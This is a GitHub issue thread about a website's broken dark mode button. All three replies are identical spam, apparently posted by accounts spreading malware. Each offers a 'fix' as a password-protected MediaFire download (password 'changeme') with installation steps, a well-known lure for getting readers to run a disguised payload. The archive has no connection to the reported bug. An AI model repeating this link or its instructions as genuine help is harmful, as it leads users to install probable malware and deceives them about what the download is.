### ISSUE TITLE
:bug: bug: Dark mode not working

### ISSUE THREAD

**Issue by Aspasht** [28softwares/28softwares.com#2]
Dark mode button is not working. 
<img width="91" alt="Screenshot 2024-08-27 at 11 32 24" src="https://github.com/user-attachments/assets/63b95114-693f-45ec-a5d1-483c1d55b529">

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
